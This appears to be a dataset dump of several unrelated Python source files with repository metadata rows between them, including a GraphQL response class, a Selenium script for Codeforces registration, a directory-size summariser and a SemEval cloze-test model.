""" % rnd.randint(0,100) )
#row=cursor.fetchone()
return
| 30.621622 | 109 | 0.611356 | 439 | 3,399 | 4.624146 | 0.323462 | 0.049261 | 0.084236 | 0.032512 | 0.361576 | 0.280788 | 0.239409 | 0.209852 | 0.173399 | 0.173399 | 0 | 0.038585 | 0.26802 | 3,399 | 110 | 110 | 30.9 | 0.777331 | 0.018535 | 0 | 0.264368 | 0 | 0 | 0.202004 | 0.036643 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.103448 | null | null | 0.126437 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62c3b75f8adcffa947ee4bcc6c76cec4ce476e9e | 1,127 | py | Python | src/aiographql/client/response.py | ehtec/aiographql-client | 66b135ee08a1c4e3c3d25e63db91e7713a99501e | [
"MIT"
] | 18 | 2019-12-08T23:38:21.000Z | 2021-04-14T17:40:34.000Z | src/aiographql/client/response.py | ehtec/aiographql-client | 66b135ee08a1c4e3c3d25e63db91e7713a99501e | [
"MIT"
] | 134 | 2019-07-30T04:51:44.000Z | 2021-05-24T07:07:02.000Z | src/aiographql/client/response.py | ehtec/aiographql-client | 66b135ee08a1c4e3c3d25e63db91e7713a99501e | [
"MIT"
] | 7 | 2019-09-26T10:14:58.000Z | 2021-01-01T06:09:11.000Z | from dataclasses import dataclass, field
from typing import Any, Dict, List
from aiographql.client.error import GraphQLError
from aiographql.client.request import GraphQLRequestContainer
@dataclass(frozen=True)
class GraphQLBaseResponse(GraphQLRequestContainer):
json: Dict[str, Any] = field(default_factory=dict)
@dataclass(frozen=True)
class GraphQLResponse(GraphQLBaseResponse):
"""
GraphQL Response object wrapping response data and any errors. This object also
contains the a copy of the :class:`GraphQLRequest` that produced this response.
"""
@property
def errors(self) -> List[GraphQLError]:
"""
A list of :class:`GraphQLError` objects if server responded with query errors.
"""
return [GraphQLError.load(error) for error in self.json.get("errors", list())]
@property
def data(self) -> Dict[str, Any]:
"""The data payload the server responded with."""
return self.json.get("data", dict())
@property
def query(self) -> str:
"""The query string used to produce this response."""
return self.request.query
| 31.305556 | 86 | 0.697427 | 134 | 1,127 | 5.858209 | 0.447761 | 0.042038 | 0.050955 | 0.061147 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.20142 | 1,127 | 35 | 87 | 32.2 | 0.872222 | 0.292813 | 0 | 0.277778 | 0 | 0 | 0.013441 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.222222 | 0 | 0.722222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
62c9b5e931b6417fe4d81185cc271efbd05d9b8d | 1,266 | py | Python | utils/loader.py | zhangcheng007/face_detection_base_on_mtcnn | 7ac1890dca16784955911b9efd0fef2c8447b9cb | [
"MIT"
] | 1 | 2017-10-20T06:47:22.000Z | 2017-10-20T06:47:22.000Z | utils/loader.py | zhangcheng007/face_detection_base_on_mtcnn | 7ac1890dca16784955911b9efd0fef2c8447b9cb | [
"MIT"
] | null | null | null | utils/loader.py | zhangcheng007/face_detection_base_on_mtcnn | 7ac1890dca16784955911b9efd0fef2c8447b9cb | [
"MIT"
] | null | null | null | import numpy as np
import sys
import cv2
sys.path.append("../")
from utils.config import config
class TestLoader:
def __init__(self, imdb, batch_size=1, shuffle=False):
self.imdb = imdb
self.batch_size = batch_size
self.shuffle = shuffle
self.size = len(imdb)#num of data
self.cur = 0
self.data = None
self.label = None
self.reset()
self.get_batch()
def reset(self):
self.cur = 0
if self.shuffle:
np.random.shuffle(self.imdb)
def iter_next(self):
return self.cur + self.batch_size <= self.size
def __iter__(self):
return self
def __next__(self):
return self.next()
def next(self):
if self.iter_next():
self.get_batch()
self.cur += self.batch_size
return self.data
else:
raise StopIteration
def getindex(self):
return self.cur / self.batch_size
def getpad(self):
if self.cur + self.batch_size > self.size:
return self.cur + self.batch_size - self.size
else:
return 0
def get_batch(self):
imdb = self.imdb[self.cur]
im = cv2.imread(imdb)
self.data = im
| 23.886792 | 58 | 0.562401 | 164 | 1,266 | 4.189024 | 0.268293 | 0.104803 | 0.113537 | 0.116448 | 0.218341 | 0.189229 | 0.189229 | 0.098981 | 0 | 0 | 0 | 0.007186 | 0.340442 | 1,266 | 52 | 59 | 24.346154 | 0.815569 | 0.008689 | 0 | 0.136364 | 0 | 0 | 0.002392 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.204545 | false | 0 | 0.090909 | 0.090909 | 0.477273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62cfcef9c0c1bac2152ebbbdc822957a7ae21154 | 3,185 | py | Python | automated_codeforces_registration/auto_register.py | Asienwald/GCI-Fedora | 378d70e97fb6fa57d127753d3bd3d6450e5a0381 | [
"MIT"
] | null | null | null | automated_codeforces_registration/auto_register.py | Asienwald/GCI-Fedora | 378d70e97fb6fa57d127753d3bd3d6450e5a0381 | [
"MIT"
] | null | null | null | automated_codeforces_registration/auto_register.py | Asienwald/GCI-Fedora | 378d70e97fb6fa57d127753d3bd3d6450e5a0381 | [
"MIT"
] | null | null | null | from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import datetime as dt
import sys
import getpass
import re
def start_registration(handle, email, pwd1, pwd2):
print("Starting registration, browser opening shortly...\n")
driver = webdriver.Chrome()
URL_TO_CONNECT = "https://codeforces.com/register"
driver.get(URL_TO_CONNECT)
handle_input = driver.find_element_by_name("handle")
email_input = driver.find_element_by_name("email")
pwd1_input = driver.find_element_by_name("password")
pwd2_input = driver.find_element_by_name("passwordConfirmation")
handle_input.send_keys(handle)
email_input.send_keys(email)
pwd1_input.send_keys(pwd1)
pwd2_input.send_keys(pwd2)
form = driver.find_element_by_id("registerForm")
form.submit()
try:
# wait for next page to load
WebDriverWait(driver, 10).until(EC.url_changes(URL_TO_CONNECT))
current_datetime = dt.datetime.now()
driver.save_screenshot(f"{current_datetime}.png")
driver.close()
print(f"Screenshot captured! Saved as {current_datetime}.png")
print("Exiting...")
sys.exit(1)
except Exception:
print("Session Timeout. Handle might already be taken.")
print("Exiting...")
driver.close()
sys.exit(1)
def main():
print('''
_________ .___ ___________ __________ .__ __ __ .__
\_ ___ \ ____ __| _/____\_ _____/__________ ____ ____ \______ \ ____ ____ |__| _______/ |_____________ _/ |_|__| ____ ____
/ \ \/ / _ \ / __ |/ __ \| __)/ _ \_ __ \_/ ___\/ __ \ | _// __ \ / ___\| |/ ___/\ __\_ __ \__ \\ __\ |/ _ \ / \
\ \___( <_> ) /_/ \ ___/| \( <_> ) | \/\ \__\ ___/ | | \ ___// /_/ > |\___ \ | | | | \// __ \| | | ( <_> ) | \
\______ /\____/\____ |\___ >___ / \____/|__| \___ >___ > |____|_ /\___ >___ /|__/____ > |__| |__| (____ /__| |__|\____/|___| /
\/ \/ \/ \/ \/ \/ \/ \/_____/ \/ \/ \/
''')
handle = input("Enter your username/handle to use: ")
while True:
email = input("Enter your email to use: ")
if re.match('.+@{1}.+[.]{1}.+', email):
break
else:
print("Please enter a valid email.\n")
while True:
pwd1 = getpass.getpass(prompt="Enter password: ")
pwd2 = getpass.getpass(prompt="Enter password again: ")
if pwd1 != pwd2:
print("Passwords don't match.\n")
elif not re.match("^(?=.*\d)(?=.*[a-z])(?=.*[A-Z])(?=.*[!@#\$%\^&]).{5,}$", pwd1):
# registration page checks for password strength
print("Password must be >5 in length, have lowercase, uppercase, numbers and special characters.\n")
else:
break
start_registration(handle, email, pwd1, pwd2)
if __name__ == '__main__':
main()
| 38.841463 | 149 | 0.546311 | 285 | 3,185 | 5.017544 | 0.410526 | 0.034965 | 0.059441 | 0.066434 | 0.174825 | 0.128671 | 0 | 0 | 0 | 0 | 0 | 0.010379 | 0.304239 | 3,185 | 81 | 150 | 39.320988 | 0.634928 | 0.02292 | 0 | 0.190476 | 0 | 0.063492 | 0.475716 | 0.031521 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031746 | false | 0.111111 | 0.111111 | 0 | 0.142857 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
62d4d2b9bbdb7c26c851c4cf1142dbfca5ebcb07 | 4,603 | py | Python | dir-stats-summary.py | rbrt-weiler/dir-stats | 1f9d1bccd9eef41016f2dcf8dca584e193414fc7 | [
"Zlib"
] | null | null | null | dir-stats-summary.py | rbrt-weiler/dir-stats | 1f9d1bccd9eef41016f2dcf8dca584e193414fc7 | [
"Zlib"
] | null | null | null | dir-stats-summary.py | rbrt-weiler/dir-stats | 1f9d1bccd9eef41016f2dcf8dca584e193414fc7 | [
"Zlib"
] | null | null | null | #!/usr/bin/python
# vim: set sw=4 sts=4 ts=8 et ft=python fenc=utf8 ff=unix tw=74 :
#
# SYNOPSIS
# ========
# This script analyses an INI file created by dir-stats.py and displays
# directories containing a certain amount of data.
#
# ARGUMENTS
# =========
# Call the script without any parameters to see an unsage message.
#
# OUTPUT
# ======
# The script will print an INI style list of directory names and byte
# counts to stdout.
#
# HISTORY
# =======
# 2008-Jan-22 rbrt-weiler
# * Created the script.
#
import getopt
import os.path
import sys
import time
import ConfigParser
##########################################################################
SCRIPT_VERSION = '1.0.0'
opt_limit = 50000000
opt_style = 'win'
##########################################################################
class MyRawConfigParser(ConfigParser.RawConfigParser):
def optionxform(self, optionstr):
return str(optionstr)
##########################################################################
def main():
global opt_limit, opt_style
try:
opts, args = getopt.getopt(sys.argv[1:], 'hl:s:', [ 'help',
'limit=', 'style=' ])
except getopt.GetoptError:
usage()
sys.exit(1)
for o, a in opts:
if o in ('-h', '--help'):
usage()
sys.exit(1)
if o in ('-l', '--limit'):
opt_limit = int(a)
if o in ('-s', '--style'):
if a in ('win', 'unix'):
opt_style = a
else:
usage()
sys.exit(1)
if 0 == len(args):
usage()
sys.exit(1)
else:
for arg in args:
if not os.path.isfile(arg):
print 'Error: "' + arg + '" is no file.'
sys.exit(2)
summarize(args)
##########################################################################
def summarize(filenames):
if 'win' == opt_style:
cmt_char = ';'
kv_sep = ' = '
else:
cmt_char = '#'
kv_sep = ': '
summary = { }
print cmt_char + ' created ' + time.asctime() + ' by ' \
+ 'dir-stats-summary v' + SCRIPT_VERSION
print cmt_char + ' using a limit of ' + str(opt_limit) + ' bytes'
for filename in filenames:
cfg_parser = MyRawConfigParser()
try:
f_in = open(filename, 'r')
except:
print 'Error: Cannot read file "' + filename + '".'
sys.exit(3)
cfg_parser.readfp(f_in)
f_in.close()
sections = cfg_parser.sections()
for section in sections:
options = cfg_parser.options(section)
for option in options:
try:
size = cfg_parser.getint(section, option)
except ValueError:
size = 0
(basedir, basename) = os.path.split(option)
if summary.has_key(basedir):
summary[basedir] = summary[basedir] + size
else:
summary[basedir] = size
total_dirs = 0
total_size = 0
filename = os.path.basename(filename)
dirs = summary.keys()
dirs.sort()
print
print '[' + filename + ']'
for dir in dirs:
if summary[dir] >= opt_limit:
print dir + kv_sep + str(summary[dir])
total_dirs = total_dirs + 1
total_size = total_size + summary[dir]
print cmt_char + ' ' + filename + ': ' + str(total_dirs) \
+ ' directories with ' + str(total_size) + ' bytes'
cfg_parser = None
summary = { }
##########################################################################
def usage():
print 'dir-stats-summary v' + SCRIPT_VERSION + ' - released ' \
+ 'under the Zlib license'
print 'Usage: ' + os.path.basename(sys.argv[0]) + ' [options] ' \
+ 'filename [...]'
print
print 'Options:'
print ' -h, --help'
print ' Display this usage message and exit.'
print ' -l BYTES, --limit=BYTES'
print ' Set the minimum number of bytes that triggers reporting '
print ' of a directory.'
print ' The default limit is 50000000 bytes.'
print ' -s STYLE, --style=STYLE'
print ' Define the style of the output. Accepted values are ' \
+ '"win" and "unix".'
print ' The default value is "win".'
##########################################################################
if '__main__' == __name__:
main()
sys.exit(0)
| 28.067073 | 74 | 0.473604 | 487 | 4,603 | 4.38193 | 0.35729 | 0.022962 | 0.022493 | 0.024367 | 0.041237 | 0.027179 | 0 | 0 | 0 | 0 | 0 | 0.014331 | 0.317836 | 4,603 | 163 | 75 | 28.239264 | 0.665287 | 0.101238 | 0 | 0.174312 | 0 | 0 | 0.17216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.045872 | null | null | 0.192661 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62dcdfc108fcc269a77defa004067921ebd5f696 | 1,067 | py | Python | sammba/registration/tests/test_base.py | salma1601/sammba-mri | c3c79ed806a4e5ce3524bc6053bf0c3ff1444113 | [
"CECILL-B"
] | null | null | null | sammba/registration/tests/test_base.py | salma1601/sammba-mri | c3c79ed806a4e5ce3524bc6053bf0c3ff1444113 | [
"CECILL-B"
] | null | null | null | sammba/registration/tests/test_base.py | salma1601/sammba-mri | c3c79ed806a4e5ce3524bc6053bf0c3ff1444113 | [
"CECILL-B"
] | null | null | null | import os
from nose import with_setup
from nose.tools import assert_true
import nibabel
from nilearn.datasets.tests import test_utils as tst
from nilearn.image import index_img
from sammba.registration import base
from sammba import testing_data
from nilearn._utils.niimg_conversions import _check_same_fov
@with_setup(tst.setup_tmpdata, tst.teardown_tmpdata)
def test_warp():
anat_file = os.path.join(os.path.dirname(testing_data.__file__),
'anat.nii.gz')
func_file = os.path.join(os.path.dirname(testing_data.__file__),
'func.nii.gz')
func_file0 = os.path.join(tst.tmpdir, 'mean_func.nii.gz')
func_img0 = index_img(func_file, 0)
func_img0.to_filename(func_file0)
registered_anat_oblique_file, mat_file =\
base._warp(anat_file, func_file0, write_dir=tst.tmpdir,
caching=False, verbose=False)
assert_true(_check_same_fov(nibabel.load(registered_anat_oblique_file),
func_img0))
assert_true(os.path.isfile(mat_file))
| 38.107143 | 75 | 0.709466 | 152 | 1,067 | 4.638158 | 0.388158 | 0.051064 | 0.042553 | 0.039716 | 0.119149 | 0.119149 | 0.119149 | 0.119149 | 0.119149 | 0.119149 | 0 | 0.008245 | 0.204311 | 1,067 | 27 | 76 | 39.518519 | 0.822144 | 0 | 0 | 0 | 0 | 0 | 0.035614 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.041667 | false | 0 | 0.375 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
62dd03d0d913944957c2612082f29f5c840f0d43 | 555 | py | Python | crawling_image/get_image.py | Lee-JH-kor/Review_Project | 5e604f2bcdceea23740759681bdc7e5d3a7670ca | [
"MIT"
] | null | null | null | crawling_image/get_image.py | Lee-JH-kor/Review_Project | 5e604f2bcdceea23740759681bdc7e5d3a7670ca | [
"MIT"
] | null | null | null | crawling_image/get_image.py | Lee-JH-kor/Review_Project | 5e604f2bcdceea23740759681bdc7e5d3a7670ca | [
"MIT"
] | 1 | 2020-11-11T05:02:37.000Z | 2020-11-11T05:02:37.000Z | import urllib.request
from bs4 import BeautifulSoup
import matplotlib.pyplot as plt
from PIL import Image
import os
def image_poster(title_address):
url = f'{title_address}'
req = urllib.request.Request(url)
res = urllib.request.urlopen(url).read()
soup = BeautifulSoup(res, 'html.parser')
soup = soup.find("div", class_="poster")
# img의 경로를 받아온다
imgUrl = soup.find("img")["src"]
# urlretrieve는 다운로드 함수
# img.alt는 이미지 대체 텍스트
urllib.request.urlretrieve(imgUrl, soup.find("img")["alt"] + '.jpg')
plt.show()
| 23.125 | 72 | 0.673874 | 76 | 555 | 4.868421 | 0.605263 | 0.140541 | 0.075676 | 0.091892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002227 | 0.190991 | 555 | 23 | 73 | 24.130435 | 0.821826 | 0.097297 | 0 | 0 | 0 | 0 | 0.102823 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.357143 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
62de74cf7251561058f563593dbf807c8c8593c6 | 16,049 | py | Python | Nowruz_SemEval.py | mohammadmahdinoori/Nowruz-at-SemEval-2022-Task-7 | d87bf033c3798ff707ba25ddffde8c46abec8bd4 | [
"MIT"
] | 2 | 2022-03-20T02:03:53.000Z | 2022-03-21T19:44:54.000Z | Nowruz_SemEval.py | mohammadmahdinoori/Nowruz-at-SemEval-2022-Task-7 | d87bf033c3798ff707ba25ddffde8c46abec8bd4 | [
"MIT"
] | null | null | null | Nowruz_SemEval.py | mohammadmahdinoori/Nowruz-at-SemEval-2022-Task-7 | d87bf033c3798ff707ba25ddffde8c46abec8bd4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Nowruz at SemEval 2022: Tackling Cloze Tests with Transformers and Ordinal Regression
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1RXkjBpzNJtc0WhhrKMjU-50rd5uSviX3
"""
import torch
import torch.nn as nn
from torch.functional import F
from datasets import Dataset
import transformers as ts
from transformers import AutoTokenizer , AutoModelForSequenceClassification
from transformers import TrainingArguments, Trainer
from transformers import DataCollatorWithPadding
from transformers import create_optimizer
from transformers.file_utils import ModelOutput
from transformers.modeling_outputs import SequenceClassifierOutput
from coral_pytorch.layers import CoralLayer
from coral_pytorch.losses import coral_loss
from coral_pytorch.dataset import levels_from_labelbatch
from coral_pytorch.dataset import proba_to_label
from dataclasses import dataclass
from typing import Optional, Tuple
import numpy as np
import pandas as pd
from scipy import stats
import sys
from data_loader import (
retrieve_instances_from_dataset,
retrieve_labels_from_dataset_for_classification,
retrieve_labels_from_dataset_for_ranking,
write_predictions_to_file,
)
"""#Preparing Data"""
def loadDataset(dataPath , labelPath=None , scoresPath=None):
dataset = pd.read_csv(dataPath, sep="\t", quoting=3)
ids , sentences , fillers = retrieve_instances_from_dataset(dataset)
#Creating dictionaries to convert datas to Huggingface Dataset
datasetDict = {
"id": ids,
"sentence": sentences,
"filler": fillers,
}
labels = None
if labelPath != None:
labels = pd.read_csv(labelPath, sep="\t", header=None, names=["Id", "Label"])
labels = retrieve_labels_from_dataset_for_classification(labels)
datasetDict["labels"] = labels
scores = None
if scoresPath != None:
scores = pd.read_csv(scoresPath, sep="\t", header=None, names=["Id", "Label"])
scores = retrieve_labels_from_dataset_for_ranking(scores)
datasetDict["scores"] = scores
#Removing Periods if fillers appear at the end of the sentence (because if we don't period will be considered last word piece of the filler)
for index , _ in enumerate(fillers):
fillers[index].replace("." , "")
#Creating Huggingface Datasets from Dictionaries
dataset = Dataset.from_dict(datasetDict)
return dataset
"""#Preprocessing"""
def preprocessDataset(dataset , tokenizer):
def addToDict(dict_1 , dict_2 , columns_1=[] , columns_2=["input_ids" , "attention_mask"]):
for item_1 , item_2 in zip(columns_1 , columns_2):
dict_1[item_1] = dict_2.pop(item_2)
def mappingFunction(dataset):
outputDict = {}
cleanedSentence = dataset["sentence"].replace("\n" , " ").replace("(...)" , "").strip()
sentenceWithFiller = cleanedSentence.replace("[MASK]" , dataset["filler"].strip()).strip()
tokenized_sentence = tokenizer(sentenceWithFiller)
addToDict(outputDict , tokenized_sentence , ["input_ids" , "attention_mask"])
#Getting the index of the last word piece of the filler
if "cls_token" in tokenizer.special_tokens_map.keys():
filler_indecies = len(tokenizer(tokenizer.special_tokens_map["cls_token"] + " " + cleanedSentence.split("[MASK]")[0].strip() + " " + dataset["filler"].strip() , add_special_tokens=False)["input_ids"]) - 1
elif "bos_token" in tokenizer.special_tokens_map.keys():
filler_indecies = len(tokenizer(tokenizer.special_tokens_map["bos_token"] + " " + cleanedSentence.split("[MASK]")[0].strip() + " " + dataset["filler"].strip() , add_special_tokens=False)["input_ids"]) - 1
else:
filler_indecies = len(tokenizer(cleanedSentence.split("[MASK]")[0].strip() + " " + dataset["filler"].strip() , add_special_tokens=False)["input_ids"]) - 1
outputDict["filler_indecies"] = filler_indecies
return outputDict
return dataset.map(mappingFunction , batched=False)
"""#Model Definition"""
@dataclass
class CustomOutput(ModelOutput):
loss: Optional[torch.FloatTensor] = None
logits: torch.FloatTensor = None
classificationOutput: torch.FloatTensor = None
regressionOutput: torch.FloatTensor = None
class SequenceClassificationModel(nn.Module):
def __init__(self,
encoder,
dim,
use_coral=False,
use_cls=True,
supportPooledRepresentation=False,
mode="both",
num_labels=3,
num_ranks=5,
lambda_c=0.5,
lambda_r=0.5,
dropout_rate=0.2):
super().__init__()
#mode can be one of these: ["both" , "classification" , "regression"]
self.encoder = encoder
self.dim = dim
self.use_coral = use_coral
self.use_cls = use_cls
self.supportPooledRepresentation = supportPooledRepresentation
self.mode = mode
self.num_labels = num_labels
self.num_ranks = num_ranks
self.lambda_c = lambda_c
self.lambda_r = lambda_r
self.dropout_rate = dropout_rate
if self.use_cls:
self.pre_classifier = nn.Linear(self.dim*2 , self.dim , bias=True)
else:
self.pre_classifier = nn.Linear(self.dim , self.dim , bias=True)
self.dropout = nn.Dropout(p=self.dropout_rate , inplace=False)
self.regressionHead = CoralLayer(self.dim , self.num_ranks)
if use_coral:
self.classificationHead = CoralLayer(self.dim , self.num_labels)
else:
self.classificationHead = nn.Linear(self.dim , self.num_labels , bias=True)
def forward(
self,
input_ids,
attention_mask,
filler_indecies,
labels=None,
scores=None,
**args):
device = self.encoder.device
# Getting fillers representation from pre-trained transformer (encoder)
sentence_embedding = self.encoder(
input_ids=input_ids,
attention_mask=attention_mask,
)
#Getting Fillers Representation
filler_tokens = sentence_embedding[0][filler_indecies[0] , filler_indecies[1]]
fillers = filler_tokens[: , 0 , :]
#Concatenating [CLS] output with Filler output if the model supports [CLS]
pooled_output = None
if self.use_cls:
if self.supportPooledRepresentation:
pooled_output = torch.concat((sentence_embedding[1] , fillers) , dim=-1)
else:
pooled_output = torch.concat((sentence_embedding[0][: , 0 , :] , fillers) , dim=-1)
else:
pooled_output = fillers
#Passing Pooled Output to another dense layer followed by activation function and dropout
pooled_output = self.pre_classifier(pooled_output)
pooled_output = nn.GELU()(pooled_output)
pooled_output = self.dropout(pooled_output)
#Passing the final output to the classificationHead and RegressionHead
classificationOutput = self.classificationHead(pooled_output)
regressionOutput = self.regressionHead(pooled_output)
totalLoss = None
classification_loss = None
regression_loss = None
#Computing classification loss
if labels != None and (self.mode.lower() == "both" or self.mode.lower() == "classification"):
if self.use_coral:
levels = levels_from_labelbatch(labels.view(-1) , self.num_labels).to(device)
classification_loss = coral_loss(classificationOutput.view(-1 , self.num_labels - 1) , levels.view(-1 , self.num_labels - 1))
else:
loss_fct = nn.CrossEntropyLoss()
classification_loss = loss_fct(classificationOutput.view(-1 , self.num_labels) , labels.view(-1))
#Computing regression loss
if scores != None and (self.mode.lower() == "both" or self.mode.lower() == "regression"):
levels = levels_from_labelbatch(scores.view(-1) , self.num_ranks).to(device)
regression_loss = coral_loss(regressionOutput.view(-1 , self.num_ranks - 1) , levels.view(-1 , self.num_ranks - 1))
if self.mode.lower() == "both" and (labels != None and scores != None):
totalLoss = (self.lambda_c * classification_loss) + (self.lambda_r * regression_loss)
elif self.mode.lower() == "classification" and labels != None:
totalLoss = classification_loss
elif self.mode.lower() == "regression" and scores != None:
totalLoss = regression_loss
outputs = torch.concat((classificationOutput , regressionOutput) , dim=-1)
finalClassificationOutput = torch.sigmoid(classificationOutput)
finalRegressionOutput = torch.sigmoid(regressionOutput)
finalClassificationOutput = proba_to_label(finalClassificationOutput.cpu().detach()).numpy()
finalRegressionOutput = torch.sum(finalRegressionOutput.cpu().detach() , dim=-1).numpy() + 1
return CustomOutput(
loss=totalLoss,
logits=outputs,
classificationOutput=finalClassificationOutput,
regressionOutput=finalRegressionOutput,
)
def model_init(encoderPath=None,
dimKey=None,
customEncoder=None,
customDim=None,
mode="both",
use_coral=True,
use_cls=True,
supportPooledRepresentation=False,
freezeEmbedding=True,
num_labels=3,
num_ranks=5,
lambda_c=0.5,
lambda_r=0.5,
dropout_rate=0.2,):
encoder = ts.AutoModel.from_pretrained(encoderPath) if encoderPath != None else customEncoder
dim = encoder.config.to_dict()[dimKey] if dimKey != None else customDim
model = SequenceClassificationModel(
encoder,
dim,
use_coral=use_coral,
use_cls=use_cls,
supportPooledRepresentation=supportPooledRepresentation,
mode=mode,
num_labels=num_labels,
num_ranks=num_ranks,
lambda_c=lambda_c,
lambda_r=lambda_r,
dropout_rate=dropout_rate,
)
try:
if freezeEmbedding:
for param in model.encoder.embeddings.parameters():
param.requires_grad = False
except:
print("The embedding layer name is different in this model, try to find the name of the emebdding layer and freeze it manually")
return model
def makeTrainer(model,
trainDataset,
data_collator,
tokenizer,
outputsPath,
learning_rate=1.90323e-05,
scheduler="cosine",
save_steps=5000,
batch_size=8,
num_epochs=5,
weight_decay=0.00123974,
roundingType="F"):
def data_collator_fn(items , columns=[]):
data_collator_input = {
"input_ids": items[columns[0]],
"attention_mask": items[columns[1]]
}
result = data_collator(data_collator_input)
items[columns[0]] = result["input_ids"]
items[columns[1]] = result["attention_mask"]
def collate_function(items):
outputDict = {
key: [] for key in items[0].keys()
}
for item in items:
for key in item.keys():
outputDict[key].append(item[key])
data_collator_fn(outputDict , ["input_ids" , "attention_mask"])
#Removing unnecessary Items from outputDict
columns = ["sentence" , "filler" , "id"]
for item in columns:
try:
outputDict.pop(item)
except:
pass
#Adding New Columns
if "labels" in outputDict.keys():
outputDict["labels"] = torch.tensor(outputDict.pop("labels"))
if "scores" in outputDict.keys():
if roundingType == "F":
outputDict["scores"] = torch.tensor(outputDict.pop("scores") , dtype=torch.int32) - 1
elif roundingType == "R":
outputDict["scores"] = torch.tensor([round(score) for score in outputDict.pop("scores")] , dtype=torch.int32) - 1
filler_indecies = torch.tensor(outputDict.pop("filler_indecies")).view(-1 , 1)
outputDict["filler_indecies"] = (torch.arange(filler_indecies.shape[0]).view(-1 , 1) , filler_indecies)
return outputDict
training_args = TrainingArguments(
outputsPath,
learning_rate= learning_rate,
lr_scheduler_type=scheduler,
save_steps=save_steps,
per_device_train_batch_size=batch_size,
num_train_epochs=num_epochs,
weight_decay=weight_decay,
remove_unused_columns=False,
)
trainer = Trainer(
model=model,
args=training_args,
train_dataset=trainDataset,
tokenizer=tokenizer,
data_collator=collate_function,
)
return trainer , collate_function
"""#Evaluating on Val Dataset"""
def evaluateModel(
model,
dataset,
collate_function,
):
model.eval()
#Passing the inputs through model
labels = []
scores = []
for item in dataset:
sample_input = collate_function([item])
outputs = model(input_ids=sample_input["input_ids"].to(model.encoder.device),
attention_mask=sample_input["attention_mask"].to(model.encoder.device),
filler_indecies=sample_input["filler_indecies"],
scores=None)
labels.append(outputs["classificationOutput"][0])
scores.append(outputs["regressionOutput"][0])
#Computing Accuracy
count = 0
correctCount = 0
for prediction , target in zip(labels , dataset["labels"]):
count += 1
correctCount += 1 if prediction == target else 0
accuracy = (correctCount / count)
#Computing Spearman
scores = np.array(scores , dtype=np.float32)
valScores = np.array(dataset["scores"] , dtype=np.float32)
spearman = stats.spearmanr(scores.reshape(-1 , 1) , valScores.reshape(-1 , 1))
return (labels , scores) , accuracy , spearman
"""#Making Predictions on Test Dataset"""
def predictOnTestDataset(
model,
dataset,
collate_function,
labelsPath=None,
scoresPath=None,
):
model.eval()
ids = []
classification_predictions = []
ranking_predictions = []
for item in dataset:
sample_input = collate_function([item])
outputs = model(input_ids=sample_input["input_ids"].to(model.encoder.device),
attention_mask=sample_input["attention_mask"].to(model.encoder.device),
filler_indecies=sample_input["filler_indecies"],
scores=None,
labels=None)
ids.append(item["id"])
classification_predictions.append(outputs["classificationOutput"][0])
ranking_predictions.append(outputs["regressionOutput"][0])
if labelsPath != None:
open(labelsPath , mode="wb")
write_predictions_to_file(labelsPath , ids , classification_predictions , "classification")
if scoresPath != None:
open(scoresPath , mode="wb")
write_predictions_to_file(scoresPath , ids , ranking_predictions , "ranking")
return ids , classification_predictions , ranking_predictions
"""#Inference"""
def inference(
model,
sentences,
fillers,
tokenizer,
collate_function
):
model.eval()
datasetDict = {
"sentence": sentences,
"filler": fillers,
}
dataset = Dataset.from_dict(datasetDict)
tokenizedDataset = preprocessDataset(dataset , tokenizer)
